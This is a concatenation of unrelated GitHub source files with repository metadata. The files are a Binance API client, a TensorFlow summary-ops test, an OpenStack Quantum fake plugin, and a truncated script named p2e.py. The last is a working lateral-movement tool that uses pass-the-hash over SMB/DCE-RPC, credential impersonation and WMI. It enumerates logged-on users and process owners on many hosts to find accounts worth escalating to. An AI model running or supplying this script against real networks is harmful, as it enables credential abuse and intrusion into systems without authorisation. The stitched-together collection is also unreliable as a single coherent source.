expected = expected.append({'NAME':'symbol','TYPE':'str','MANDATORY':True,'DEFAULT':'','FOUND':False,'VALID':enumSymbols}, ignore_index=True)
expected = expected.append({'NAME':'limit','TYPE':'int','MANDATORY':False,'DEFAULT':500,'FOUND':False,'MAXIMUM':500}, ignore_index=True)
expected = expected.append({'NAME':'interval','TYPE':'str','MANDATORY':True,'DEFAULT':'','FOUND':False,'VALID':enumIntervals}, ignore_index=True)
expected = expected.append({'NAME':'startTime','TYPE':'int','MANDATORY':False,'DEFAULT':'','FOUND':False}, ignore_index=True)
expected = expected.append({'NAME':'endTime','TYPE':'int','MANDATORY':False,'DEFAULT':'','FOUND':False}, ignore_index=True)
# API specific values
path = '/api/v1/klines'
verb = 'get'
# check time inputs
# the documentation does not specifically mention time limit spacing, limit spacing as in other api calls
# so just checking the basic length of timestamps.
if (('startTime' in queryParams) and ('endTime' in queryParams)):
if ((len(str(queryParams['startTime'])) != 13) or (len(str(queryParams['endTime'])) != 13)):
self.logger.error("startTime or endTime contain invalid values, return 0 ")
return 0
else:
if(('startTime' in queryParams) or ('endTime' in queryParams)):
self.logger.error("startTime or endTime missing, return 0 ")
return 0
return self.requestSender(path, verb, queryParams, expected)
def getTicker(self, tickerType, queryParams={}):
#
# ---- DESCRIPTION ---
# Gets ticker outputs
# - the 24 hour ticker for a specified asset with GET /api/v1/ticker/24hr
# - the current symbol and price for all assets with GET /api/v1/ticker/allPrices
# - the current book for all assets with GET /api/v1/ticker/allBookTickers
#
# ---- INPUTS ---
# All 3 API calls require a tickerType in ['24hr','allPrices','allBookTickers']
#
# Additional input for symbol if tickerType is '24hr':
# - /api/v1/ticker/24hr: {'symbol':'SALTBTC'}
#
# ---- OUTUTS ---
# returns a json object as specified in the API documentation or 0 if there was a problem
#
# ---- NOTES ---
# This consolidates 3 separate relatively simple API calls into a single method.
# pandas dataframe containing parameter definitions from Binance API documentation
expected = pd.DataFrame()
if (tickerType == '24hr'):
# valid values
enumSymbols = self.getSymbols()
expected = expected.append({'NAME':'symbol','TYPE':'str','MANDATORY':True,'DEFAULT':'','FOUND':False,'VALID':enumSymbols}, ignore_index=True)
path = '/api/v1/ticker/24hr'
elif (tickerType == 'allPrices'):
path = '/api/v1/ticker/allPrices'
elif (tickerType == 'allBookTickers'):
path = '/api/v1/ticker/allBookTickers'
else:
# invalid tickerType
self.logger.error("Invalid tickerType %s",tickerType)
return 0
# API specific inputs
verb = 'get'
return self.requestSender(path, verb, queryParams, expected)
def createOrder(self, queryParams, testFlag=False):
#
# ---- DESCRIPTION ---
# Creates an order as POST on /api/v3/order if testFlag not specified
# or /api/v3/order/test if testFlag=True
#
# ---- INPUTS ---
# - python dictionary of input parameters (see documentation)
#
# ---- OUTUTS ---
# returns a json object as specified in the API documentation or 0 if there was a problem
#
# ---- NOTES ---
#
# enum definitions from documentation
enumSymbols = self.getSymbols()
enumSide = ['BUY','SELL']
enumType = ['MARKET','LIMIT']
enumTIF = ['GTC','IOC']
# pandas dataframe containing parameter definitions from Binance API documentation
expected = pd.DataFrame()
expected = expected.append({'NAME':'symbol','TYPE':'str','MANDATORY':True,'DEFAULT':'','FOUND':False,'VALID':enumSymbols}, ignore_index=True)
expected = expected.append({'NAME':'side','TYPE':'str','MANDATORY':True,'DEFAULT':'','FOUND':False,'VALID':enumSide}, ignore_index=True)
expected = expected.append({'NAME':'type','TYPE':'str','MANDATORY':True,'DEFAULT':'','FOUND':False,'VALID':enumType}, ignore_index=True)
expected = expected.append({'NAME':'quantity','TYPE':'float','MANDATORY':True,'DEFAULT':'','FOUND':False}, ignore_index=True)
expected = expected.append({'NAME':'newClientOrderId','TYPE':'str','MANDATORY':False,'DEFAULT':'','FOUND':False}, ignore_index=True)
expected = expected.append({'NAME':'stopPrice','TYPE':'float','MANDATORY':False,'DEFAULT':'','FOUND':False}, ignore_index=True)
expected = expected.append({'NAME':'icebergQty','TYPE':'float','MANDATORY':False,'DEFAULT':'','FOUND':False}, ignore_index=True)
expected = expected.append({'NAME':'timestamp','TYPE':'int','MANDATORY':True,'DEFAULT':'','FOUND':False}, ignore_index=True)
# if it is a type=LIMIT order we have to send price and timeInForce or the Binance API sends back an error
if (queryParams['type'] == 'LIMIT'):
# add price and timeInForce to expected
expected = expected.append({'NAME':'price','TYPE':'float','MANDATORY':True,'DEFAULT':'','FOUND':False}, ignore_index=True)
expected = expected.append({'NAME':'timeInForce','TYPE':'str','MANDATORY':True,'DEFAULT':'','FOUND':False,'VALID':enumTIF}, ignore_index=True)
else:
# it is a market order and we should not include price or timeInForce
queryParams.pop('price',None)
queryParams.pop('timeInForce',None)
# API specific values
verb = 'post'
signed = True
# set path based on wheter it is a test or not
if (testFlag):
# it is a test
path = '/api/v3/order/test'
# recvWindow is not specified for /api/v3/order but is for /api/v3/order/test
expected = expected.append({'NAME':'recvWindow','TYPE':'int','MANDATORY':False,'DEFAULT':'','FOUND':False}, ignore_index=True)
else:
# the real deal
path = '/api/v3/order'
# orders require a current timestamp, generate one if it is not passed in
queryParams = self.getTimestamp(queryParams)
if (queryParams):
# send the request
return self.requestSender(path, verb, queryParams, expected, signed)
else:
return 0
def queryOrder(self, queryParams):
#
# ---- DESCRIPTION ---
# Queries an order as GET on /api/v3/order
#
# ---- INPUTS ---
# - python dictionary of input parameters (see documentation)
#
# ---- OUTUTS ---
# returns a json object as specified in the API documentation or 0 if there was a problem
#
# ---- NOTES ---
#
# enum definitions from documentation
enumSymbols = self.getSymbols()
# pandas dataframe containing parameter definitions from Binance API documentation
expected = pd.DataFrame()
expected = expected.append({'NAME':'symbol','TYPE':'str','MANDATORY':True,'DEFAULT':'','FOUND':False,'VALID':enumSymbols}, ignore_index=True)
expected = expected.append({'NAME':'orderId','TYPE':'int','MANDATORY':False,'DEFAULT':'','FOUND':False}, ignore_index=True)
expected = expected.append({'NAME':'origClientOrderId','TYPE':'str','MANDATORY':False,'DEFAULT':'','FOUND':False}, ignore_index=True)
expected = expected.append({'NAME':'recvWindow','TYPE':'int','MANDATORY':False,'DEFAULT':'','FOUND':False}, ignore_index=True)
expected = expected.append({'NAME':'timestamp','TYPE':'int','MANDATORY':True,'DEFAULT':'','FOUND':False}, ignore_index=True)
# API specific values
path = '/api/v3/order'
verb = 'get'
signed = True
# orders require a current timestamp, generate one if it is not passed in
queryParams = self.getTimestamp(queryParams)
if (queryParams):
# send the request
return self.requestSender(path, verb, queryParams, expected, signed)
else:
return 0
def cancelOrder(self, queryParams):
#
# ---- DESCRIPTION ---
# Cancels an order as DELETE on /api/v3/order
#
# ---- INPUTS ---
# - python dictionary of input parameters (see documentation)
#
# ---- OUTUTS ---
# returns a json object as specified in the API documentation or 0 if there was a problem
#
# ---- NOTES ---
#
# enum definitions from documentation
enumSymbols = self.getSymbols()
# pandas dataframe containing parameter definitions from Binance API documentation
expected = pd.DataFrame()
expected = expected.append({'NAME':'symbol','TYPE':'str','MANDATORY':True,'DEFAULT':'','FOUND':False,'VALID':enumSymbols}, ignore_index=True)
expected = expected.append({'NAME':'orderId','TYPE':'int','MANDATORY':False,'DEFAULT':'','FOUND':False}, ignore_index=True)
expected = expected.append({'NAME':'origClientOrderId','TYPE':'str','MANDATORY':False,'DEFAULT':'','FOUND':False}, ignore_index=True)
expected = expected.append({'NAME':'newClientOrderId','TYPE':'str','MANDATORY':False,'DEFAULT':'','FOUND':False}, ignore_index=True)
expected = expected.append({'NAME':'recvWindow','TYPE':'int','MANDATORY':False,'DEFAULT':'','FOUND':False}, ignore_index=True)
expected = expected.append({'NAME':'timestamp','TYPE':'int','MANDATORY':True,'DEFAULT':'','FOUND':False}, ignore_index=True)
# API specific values
path = '/api/v3/order'
verb = 'delete'
signed = True
# orders require a current timestamp, generate one if it is not passed in
queryParams = self.getTimestamp(queryParams)
if (queryParams):
# send the request
return self.requestSender(path, verb, queryParams, expected, signed)
else:
return 0
def getOpenOrders(self, queryParams):
#
# ---- DESCRIPTION ---
# Retrieves a list of open orders with GET on /api/v3/openOrders
#
# ---- INPUTS ---
# - python dictionary of input parameters (see documentation)
#
# ---- OUTUTS ---
# returns a json object as specified in the API documentation or 0 if there was a problem
#
# ---- NOTES ---
#
# enum definitions from documentation
enumSymbols = self.getSymbols()
# pandas dataframe containing parameter definitions from Binance API documentation
expected = pd.DataFrame()
expected = expected.append({'NAME':'symbol','TYPE':'str','MANDATORY':True,'DEFAULT':'','FOUND':False,'VALID':enumSymbols}, ignore_index=True)
expected = expected.append({'NAME':'recvWindow','TYPE':'int','MANDATORY':False,'DEFAULT':'','FOUND':False}, ignore_index=True)
expected = expected.append({'NAME':'timestamp','TYPE':'int','MANDATORY':True,'DEFAULT':'','FOUND':False}, ignore_index=True)
# API specific values
path = '/api/v3/openOrders'
verb = 'get'
signed = True
# orders require a current timestamp, generate one if it is not passed in
queryParams = self.getTimestamp(queryParams)
if (queryParams):
# send the request
return self.requestSender(path, verb, queryParams, expected, signed)
else:
return 0
def getAllOrders(self, queryParams):
#
# ---- DESCRIPTION ---
# Retrieves a list of orders with GET on /api/v3/allOrders
#
# ---- INPUTS ---
# - python dictionary of input parameters (see documentation)
#
# ---- OUTUTS ---
# returns a json object as specified in the API documentation or 0 if there was a problem
#
# ---- NOTES ---
#
# enum definitions from documentation
enumSymbols = self.getSymbols()
# pandas dataframe containing parameter definitions from Binance API documentation
expected = pd.DataFrame()
expected = expected.append({'NAME':'symbol','TYPE':'str','MANDATORY':True,'DEFAULT':'','FOUND':False,'VALID':enumSymbols}, ignore_index=True)
expected = expected.append({'NAME':'recvWindow','TYPE':'int','MANDATORY':False,'DEFAULT':'','FOUND':False}, ignore_index=True)
expected = expected.append({'NAME':'orderId','TYPE':'int','MANDATORY':False,'DEFAULT':'','FOUND':False}, ignore_index=True)
expected = expected.append({'NAME':'limit','TYPE':'int','MANDATORY':False,'DEFAULT':500,'FOUND':False,'MAXIMUM':500}, ignore_index=True)
expected = expected.append({'NAME':'timestamp','TYPE':'int','MANDATORY':True,'DEFAULT':'','FOUND':False}, ignore_index=True)
# API specific values
path = '/api/v3/allOrders'
verb = 'get'
signed = True
# orders require a current timestamp, generate one if it is not passed in
queryParams = self.getTimestamp(queryParams)
if (queryParams):
# send the request
return self.requestSender(path, verb, queryParams, expected, signed)
else:
return 0
def getAccountInfo(self, queryParams):
#
# ---- DESCRIPTION ---
# Retrieves account info with GET on /api/v3/account
#
# ---- INPUTS ---
# - python dictionary of input parameters (see documentation)
#
# ---- OUTUTS ---
# returns a json object as specified in the API documentation or 0 if there was a problem
#
# ---- NOTES ---
#
# pandas dataframe containing parameter definitions from Binance API documentation
expected = pd.DataFrame()
expected = expected.append({'NAME':'recvWindow','TYPE':'int','MANDATORY':False,'DEFAULT':'','FOUND':False}, ignore_index=True)
expected = expected.append({'NAME':'timestamp','TYPE':'int','MANDATORY':True,'DEFAULT':'','FOUND':False}, ignore_index=True)
# API specific values
path = '/api/v3/account'
verb = 'get'
signed = True
# orders require a current timestamp, generate one if it is not passed in
queryParams = self.getTimestamp(queryParams)
if (queryParams):
# send the request
return self.requestSender(path, verb, queryParams, expected, signed)
else:
return 0
def getAccountTrades(self, queryParams):
#
# ---- DESCRIPTION ---
# Retrieves account trade history info with GET on /api/v3/myTrades
#
# ---- INPUTS ---
# - python dictionary of input parameters (see documentation)
#
# ---- OUTUTS ---
# returns a json object as specified in the API documentation or 0 if there was a problem
#
# ---- NOTES ---
#
# enum definitions from documentation
enumSymbols = self.getSymbols()
# pandas dataframe containing parameter definitions from Binance API documentation
expected = pd.DataFrame()
expected = expected.append({'NAME':'symbol','TYPE':'str','MANDATORY':True,'DEFAULT':'','FOUND':False,'VALID':enumSymbols}, ignore_index=True)
expected = expected.append({'NAME':'limit','TYPE':'int','MANDATORY':False,'DEFAULT':500,'FOUND':False,'MAXIMUM':500}, ignore_index=True)
expected = expected.append({'NAME':'fromId','TYPE':'int','MANDATORY':False,'DEFAULT':'','FOUND':False}, ignore_index=True)
expected = expected.append({'NAME':'recvWindow','TYPE':'int','MANDATORY':False,'DEFAULT':'','FOUND':False}, ignore_index=True)
expected = expected.append({'NAME':'timestamp','TYPE':'int','MANDATORY':True,'DEFAULT':'','FOUND':False}, ignore_index=True)
# API specific values
path = '/api/v3/myTrades'
verb = 'get'
signed = True
# orders require a current timestamp, generate one if it is not passed in
queryParams = self.getTimestamp(queryParams)
if (queryParams):
# send the request
return self.requestSender(path, verb, queryParams, expected, signed)
else:
return 0
| {
"content_hash": "d1ff5591fb48f3400aae0503d80ea39e",
"timestamp": "",
"source": "github",
"line_count": 808,
"max_line_length": 156,
"avg_line_length": 37.95792079207921,
"alnum_prop": 0.6766547114444083,
"repo_name": "js7558/pyBinance",
"id": "bbfa8b0a4c9a589ee11984930cf26d3891a248e9",
"size": "32058",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Binance.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "62407"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tempfile
import numpy as np
import six
from tensorflow.contrib.summary import summary_ops
from tensorflow.contrib.summary import summary_test_util
from tensorflow.core.framework import graph_pb2
from tensorflow.core.framework import node_def_pb2
from tensorflow.core.framework import types_pb2
from tensorflow.python.eager import function
from tensorflow.python.eager import test
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.platform import gfile
from tensorflow.python.training import training_util
get_all = summary_test_util.get_all
get_one = summary_test_util.get_one
_NUMPY_NUMERIC_TYPES = {
types_pb2.DT_HALF: np.float16,
types_pb2.DT_FLOAT: np.float32,
types_pb2.DT_DOUBLE: np.float64,
types_pb2.DT_INT8: np.int8,
types_pb2.DT_INT16: np.int16,
types_pb2.DT_INT32: np.int32,
types_pb2.DT_INT64: np.int64,
types_pb2.DT_UINT8: np.uint8,
types_pb2.DT_UINT16: np.uint16,
types_pb2.DT_UINT32: np.uint32,
types_pb2.DT_UINT64: np.uint64,
types_pb2.DT_COMPLEX64: np.complex64,
types_pb2.DT_COMPLEX128: np.complex128,
types_pb2.DT_BOOL: np.bool_,
}
class TargetTest(test_util.TensorFlowTestCase):
def testShouldRecordSummary(self):
self.assertFalse(summary_ops.should_record_summaries())
with summary_ops.always_record_summaries():
self.assertTrue(summary_ops.should_record_summaries())
def testSummaryOps(self):
training_util.get_or_create_global_step()
logdir = tempfile.mkdtemp()
with summary_ops.create_file_writer(
logdir, max_queue=0,
name='t0').as_default(), summary_ops.always_record_summaries():
summary_ops.generic('tensor', 1, '')
summary_ops.scalar('scalar', 2.0)
summary_ops.histogram('histogram', [1.0])
summary_ops.image('image', [[[[1.0]]]])
summary_ops.audio('audio', [[1.0]], 1.0, 1)
# The working condition of the ops is tested in the C++ test so we just
# test here that we're calling them correctly.
self.assertTrue(gfile.Exists(logdir))
def testDefunSummarys(self):
training_util.get_or_create_global_step()
logdir = tempfile.mkdtemp()
with summary_ops.create_file_writer(
logdir, max_queue=0,
name='t1').as_default(), summary_ops.always_record_summaries():
@function.defun
def write():
summary_ops.scalar('scalar', 2.0)
write()
events = summary_test_util.events_from_logdir(logdir)
self.assertEqual(len(events), 2)
self.assertEqual(events[1].summary.value[0].simple_value, 2.0)
def testSummaryName(self):
training_util.get_or_create_global_step()
logdir = tempfile.mkdtemp()
with summary_ops.create_file_writer(
logdir, max_queue=0,
name='t2').as_default(), summary_ops.always_record_summaries():
summary_ops.scalar('scalar', 2.0)
events = summary_test_util.events_from_logdir(logdir)
self.assertEqual(len(events), 2)
self.assertEqual(events[1].summary.value[0].tag, 'scalar')
def testSummaryNameScope(self):
training_util.get_or_create_global_step()
logdir = tempfile.mkdtemp()
with summary_ops.create_file_writer(
logdir, max_queue=0,
name='t2').as_default(), summary_ops.always_record_summaries():
with ops.name_scope('scope'):
summary_ops.scalar('scalar', 2.0)
events = summary_test_util.events_from_logdir(logdir)
self.assertEqual(len(events), 2)
self.assertEqual(events[1].summary.value[0].tag, 'scope/scalar')
def testSummaryGlobalStep(self):
step = training_util.get_or_create_global_step()
logdir = tempfile.mkdtemp()
with summary_ops.create_file_writer(
logdir, max_queue=0,
name='t2').as_default(), summary_ops.always_record_summaries():
summary_ops.scalar('scalar', 2.0, step=step)
events = summary_test_util.events_from_logdir(logdir)
self.assertEqual(len(events), 2)
self.assertEqual(events[1].summary.value[0].tag, 'scalar')
def testMaxQueue(self):
logs = tempfile.mkdtemp()
with summary_ops.create_file_writer(
logs, max_queue=2, flush_millis=999999,
name='lol').as_default(), summary_ops.always_record_summaries():
get_total = lambda: len(summary_test_util.events_from_logdir(logs))
# Note: First tf.Event is always file_version.
self.assertEqual(1, get_total())
summary_ops.scalar('scalar', 2.0, step=1)
self.assertEqual(1, get_total())
summary_ops.scalar('scalar', 2.0, step=2)
self.assertEqual(3, get_total())
def testFlush(self):
logs = tempfile.mkdtemp()
with summary_ops.create_file_writer(
logs, max_queue=999999, flush_millis=999999,
name='lol').as_default(), summary_ops.always_record_summaries():
get_total = lambda: len(summary_test_util.events_from_logdir(logs))
# Note: First tf.Event is always file_version.
self.assertEqual(1, get_total())
summary_ops.scalar('scalar', 2.0, step=1)
summary_ops.scalar('scalar', 2.0, step=2)
self.assertEqual(1, get_total())
summary_ops.flush()
self.assertEqual(3, get_total())
class DbTest(summary_test_util.SummaryDbTest):
def testIntegerSummaries(self):
step = training_util.create_global_step()
writer = self.create_db_writer()
def adder(x, y):
state_ops.assign_add(step, 1)
summary_ops.generic('x', x)
summary_ops.generic('y', y)
sum_ = x + y
summary_ops.generic('sum', sum_)
return sum_
with summary_ops.always_record_summaries():
with writer.as_default():
self.assertEqual(5, adder(int64(2), int64(3)).numpy())
six.assertCountEqual(
self, [1, 1, 1],
get_all(self.db, 'SELECT step FROM Tensors WHERE dtype IS NOT NULL'))
six.assertCountEqual(self, ['x', 'y', 'sum'],
get_all(self.db, 'SELECT tag_name FROM Tags'))
x_id = get_one(self.db, 'SELECT tag_id FROM Tags WHERE tag_name = "x"')
y_id = get_one(self.db, 'SELECT tag_id FROM Tags WHERE tag_name = "y"')
sum_id = get_one(self.db, 'SELECT tag_id FROM Tags WHERE tag_name = "sum"')
with summary_ops.always_record_summaries():
with writer.as_default():
self.assertEqual(9, adder(int64(4), int64(5)).numpy())
six.assertCountEqual(
self, [1, 1, 1, 2, 2, 2],
get_all(self.db, 'SELECT step FROM Tensors WHERE dtype IS NOT NULL'))
six.assertCountEqual(self, [x_id, y_id, sum_id],
get_all(self.db, 'SELECT tag_id FROM Tags'))
self.assertEqual(2, get_tensor(self.db, x_id, 1))
self.assertEqual(3, get_tensor(self.db, y_id, 1))
self.assertEqual(5, get_tensor(self.db, sum_id, 1))
self.assertEqual(4, get_tensor(self.db, x_id, 2))
self.assertEqual(5, get_tensor(self.db, y_id, 2))
self.assertEqual(9, get_tensor(self.db, sum_id, 2))
six.assertCountEqual(
self, ['experiment'],
get_all(self.db, 'SELECT experiment_name FROM Experiments'))
six.assertCountEqual(self, ['run'],
get_all(self.db, 'SELECT run_name FROM Runs'))
six.assertCountEqual(self, ['user'],
get_all(self.db, 'SELECT user_name FROM Users'))
def testBadExperimentName(self):
with self.assertRaises(ValueError):
self.create_db_writer(experiment_name='\0')
def testBadRunName(self):
with self.assertRaises(ValueError):
self.create_db_writer(run_name='\0')
def testBadUserName(self):
with self.assertRaises(ValueError):
self.create_db_writer(user_name='-hi')
with self.assertRaises(ValueError):
self.create_db_writer(user_name='hi-')
with self.assertRaises(ValueError):
self.create_db_writer(user_name='@')
def testGraphSummary(self):
training_util.get_or_create_global_step()
name = 'hi'
graph = graph_pb2.GraphDef(node=(node_def_pb2.NodeDef(name=name),))
with summary_ops.always_record_summaries():
with self.create_db_writer().as_default():
summary_ops.graph(graph)
six.assertCountEqual(self, [name],
get_all(self.db, 'SELECT node_name FROM Nodes'))
def get_tensor(db, tag_id, step):
cursor = db.execute(
'SELECT dtype, shape, data FROM Tensors WHERE series = ? AND step = ?',
(tag_id, step))
dtype, shape, data = cursor.fetchone()
assert dtype in _NUMPY_NUMERIC_TYPES
buf = np.frombuffer(data, dtype=_NUMPY_NUMERIC_TYPES[dtype])
if not shape:
return buf[0]
return buf.reshape([int(i) for i in shape.split(',')])
def int64(x):
return array_ops.constant(x, dtypes.int64)
if __name__ == '__main__':
test.main()
| {
"content_hash": "02466a73180ebd3a30fefe8623e9fe45",
"timestamp": "",
"source": "github",
"line_count": 246,
"max_line_length": 79,
"avg_line_length": 36.39430894308943,
"alnum_prop": 0.6632413716072825,
"repo_name": "Xeralux/tensorflow",
"id": "c756f8b27055f9cf86a311e485d97745a3c7a95b",
"size": "9642",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tensorflow/contrib/summary/summary_ops_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "9274"
},
{
"name": "C",
"bytes": "340972"
},
{
"name": "C++",
"bytes": "39479562"
},
{
"name": "CMake",
"bytes": "194702"
},
{
"name": "Go",
"bytes": "1046987"
},
{
"name": "HTML",
"bytes": "4680032"
},
{
"name": "Java",
"bytes": "567239"
},
{
"name": "Jupyter Notebook",
"bytes": "1940883"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "Makefile",
"bytes": "48231"
},
{
"name": "Objective-C",
"bytes": "12456"
},
{
"name": "Objective-C++",
"bytes": "94385"
},
{
"name": "PHP",
"bytes": "2140"
},
{
"name": "Perl",
"bytes": "6179"
},
{
"name": "Perl 6",
"bytes": "1357"
},
{
"name": "PureBasic",
"bytes": "25356"
},
{
"name": "Python",
"bytes": "33675501"
},
{
"name": "Ruby",
"bytes": "533"
},
{
"name": "Shell",
"bytes": "425916"
}
],
"symlink_target": ""
} |
from quantum.common import exceptions as q_exc
from quantum.common.utils import find_config_file
from quantum.db import api as db
from quantum.db import db_base_plugin_v2
from quantum.db import l3_db
from quantum.db import models_v2
class Fake1(db_base_plugin_v2.QuantumDbPluginV2,
l3_db.L3_NAT_db_mixin):
supported_extension_aliases = ['router']
def fake_func(self):
return 'fake1'
def create_network(self, context, network):
session = context.session
with session.begin(subtransactions=True):
net = super(Fake1, self).create_network(context, network)
self._process_l3_create(context, network['network'], net['id'])
self._extend_network_dict_l3(context, net)
return net
def update_network(self, context, id, network):
session = context.session
with session.begin(subtransactions=True):
net = super(Fake1, self).update_network(context, id,
network)
self._process_l3_update(context, network['network'], id)
self._extend_network_dict_l3(context, net)
return net
def delete_network(self, context, id):
return super(Fake1, self).delete_network(context, id)
def create_port(self, context, port):
port = super(Fake1, self).create_port(context, port)
return port
def create_subnet(self, context, subnet):
subnet = super(Fake1, self).create_subnet(context, subnet)
return subnet
def update_port(self, context, id, port):
port = super(Fake1, self).update_port(context, id, port)
return port
def delete_port(self, context, id, l3_port_check=True):
return super(Fake1, self).delete_port(context, id)
class Fake2(Fake1):
def fake_func(self):
return 'fake2'
def fake_func2(self):
return 'fake2'
| {
"content_hash": "935a889d813ff9ba9550bde20b8231e6",
"timestamp": "",
"source": "github",
"line_count": 57,
"max_line_length": 75,
"avg_line_length": 33.526315789473685,
"alnum_prop": 0.6347462061747776,
"repo_name": "psiwczak/quantum",
"id": "98a9884bcfb29d64ac61925c6209592eff3d2a71",
"size": "2576",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "quantum/tests/unit/metaplugin/fake_plugin.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "67928"
},
{
"name": "Perl",
"bytes": "32974"
},
{
"name": "Python",
"bytes": "2446843"
},
{
"name": "Scala",
"bytes": "3005"
},
{
"name": "Shell",
"bytes": "7879"
}
],
"symlink_target": ""
} |
import win32com.client
import argparse
import win32security
import win32net
import win32netcon
import re
import string
from impacket.structure import Structure
from impacket.nmb import NetBIOSTimeout
from impacket.dcerpc import transport
from impacket import uuid
from struct import pack
# Get arguments to run the script
parser = argparse.ArgumentParser(prog='p2e.py',
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description='Find running process that can be used to escalate access.',
epilog='Example: p2e.py --iplist iplist.txt --user test --pass testpass --domain testdomain --type smb')
parser.add_argument('--iplist',
required=True,
help='file list of IPs that we can login with using provided username and password')
parser.add_argument('--user',
required=True,
help='the username to use for authentication')
parser.add_argument('--pass',
required=True,
help='the password to use for authentication')
parser.add_argument('--domain',
default='',
help='the Domain to use for authentication')
parser.add_argument('--type',
required=True,
default='smb',
help='which type of connection to we use, WMI or SMB')
parser.set_defaults(domain='', type='smb')
# Function for use in PtH attack
def utf16(str):
return str.encode('utf_16_le')
# Class for use in PtH attack
class B1(Structure):
alignment = 4
structure = (
('id', '<L=0x41414141'),
('max', '<L'),
('offset', '<L=0'),
('actual', '<L'),
('str', '%s'),
)
# Class for use in PtH attack
class NetrWkstaUserEnum(Structure):
alignment = 4
opnum = 2
structure = (
('server', ':', B1),
('info_level1', '<L=1'),
('info_level2', '<L=1'),
('referent_id1', '<L=0x42424242'),
('num_entries', '<L=0'),
('null_pointer', '<L=0'),
('max_len', '<L'),
('referent_id2', '<L=0x43434343'),
('enumeration_handle', '<L=0x00000000'),
)
# Stick arguments in variable
args = vars(parser.parse_args())
# Load file containing IP list
ips = open(args['iplist'])
# Variable to store unique users in
uniqUsers = dict()
# Function for performing pass the hash
# This function relies on the Core Impacket library
def pth(server):
# Split the hash
lmhash, nthash = args['pass'].split(':')
# Setup memory, pipe, and MSRPC bindings for DCE RPC connection
memory_size = 1024 * 1024
pipe = 'wkssvc'
UUID = ('6bffd098-a112-3610-9833-46c3f87e345a ', '1.0')
port = '445'
stringbinding = "ncacn_np:%(server)s[\\pipe\\%(pipe)s]"
stringbinding %= {'server':server, 'pipe':pipe}
query = NetrWkstaUserEnum()
host = "%s\x00" % (server)
query['server'] = B1()
query['server']['id'] = 0x41414141
query['server']['actual'] = len(host)
query['server']['max'] = len(host)
query['server']['str'] = utf16(host)
query['max_len'] = memory_size
# Create the DCE RPC connection, pass in credentials
trans = transport.DCERPCTransportFactory(stringbinding)
trans.set_dport(port)
trans.set_credentials(args['user'], '', args['domain'], lmhash, nthash)
# Attempt to make a connection, if not then it failed and move on
try:
# Establish DCE RPC connection
trans.connect()
dce = trans.DCERPC_class(trans)
# Bind or fail
try:
# Bind the the correct \\wkssvc UUDI
dce.bind(uuid.uuidtup_to_bin((UUID[0], UUID[1])))
except:
print '[*] SMB connection to '+server+' failed'
# Make the query to NetrWkstaUserEnum on the target to get unique users or fail
try:
dce.call(query.opnum, query)
# If the query suceeded, receive data or fail
try:
raw = dce.recv()
status = raw[-4:]
# Check for a successful status, if so continue to grab users
if(status == pack("<L", 0x00000000)):
# Perform a bunch of encoding/decoding to remove junk I don't want
# Couldn't find any good references on packet structure, so this is ugly
# Converting to hex, replacing non-printable characters with chars like ; and \ that can be parsed
rawData = raw.decode('utf-8', 'ignore')
hexData = u''.join(rawData).encode('hex').strip()
stripData = re.sub('0000000000060000000000000006000000', '5c', hexData)
stripData = re.sub('00000001000000000000000100000000000000080000000000000008000000', '3b', stripData)
stripData = re.sub('0000000[a-efA-F0-9]000000000000000[a-fA-F0-9]000000', '3b', stripData)
stripData = re.sub('0200070000000000000007000000', '3b', stripData)
stripData = re.sub('000000100000000000000010000000', '3b', stripData)
cleanData = ''.join(filter(lambda x: x in string.printable, stripData.strip().decode('hex')))
# Split on the characters that were replaced with ;
pairs = cleanData.split(';')
pair = 0
# For each pair, add the unique user to the dict
for i in pairs:
if pair > 0:
if re.search('\\\\', i):
cred = i.split('\\')
uniqUsers[cred[1]+'\\'+cred[0]] = cred[1]+'\\'+cred[0]
pair += 1
except:
print '[*] SMB connection to '+server+' failed'
except:
print '[*] SMB connection to '+server+' failed'
except:
print '[*] SMB connection to '+server+' failed'
# Function to use standard SMB libraries with username + password
def smbUsers(server):
fixDomain = ''
# If the domain is set, use it else use . which is basically an empty domain
if re.search('^[a-zA-Z0-9]', args['domain']):
fixDomain = args['domain']
else:
fixDomain = '.'
# Impersonate the user passed as the --user --pass credentials
handle = win32security.LogonUser(
args['user'],
fixDomain,
args['pass'],
win32security.LOGON32_LOGON_NEW_CREDENTIALS,
win32security.LOGON32_PROVIDER_DEFAULT
)
# Complete impersonation
win32security.ImpersonateLoggedOnUser(handle)
# Try to make an SMB connection, else fail
try:
resume=1
pref=win32netcon.MAX_PREFERRED_LENGTH
level=1
# Loop through each response in the connection and get users
while resume:
(userList,total,endhandle)=win32net.NetWkstaUserEnum(server,level,resume,pref)
# Loop through each user provided and add to uniqUsers dict
for i in userList:
account = i['logon_domain']+'\\'+i['username']
uniqUsers[account] = account
resume=endhandle
except:
print '[*] SMB connection to '+server+' failed'
# Function to make a WMI connection to get unique users
def wmiUsers(server):
# Attempt to make a WMI connection
try:
wmiUser = args['user']
# If domain option was passed (--domain) use it as part of the account
if re.search('^[a-zA-Z0-9]', args['domain']):
wmiUser = args['domain']+'\\'+args['user']
# Setup WMI and connect using provided IP, username, and password,
# then search for running processes
loc = win32com.client.Dispatch('WbemScripting.SWbemLocator')
conn = loc.ConnectServer(server, 'root\\cimv2', wmiUser, args['pass'])
processes = conn.InstancesOf('Win32_Process')
# Loop through each identified process
for process in processes:
# Get owner information for each process
disp = win32com.client.Dispatch(process)
meth = disp.Methods_('GetOwner')
methVals = disp.ExecMethod_(meth.Name)
# Build a variable containing the WORKGROUP or DOMAIN + the User account
account = str(methVals.Properties_('Domain').Value)+'\\'+str(methVals.Properties_('User').Value)
# If owner information was not null/NONE, then add to dict
if re.search('None', account) is None:
uniqUsers[account] = account
except:
print '[*] WMI connection to '+server+' failed'
# If the correct type wasn't set then bail
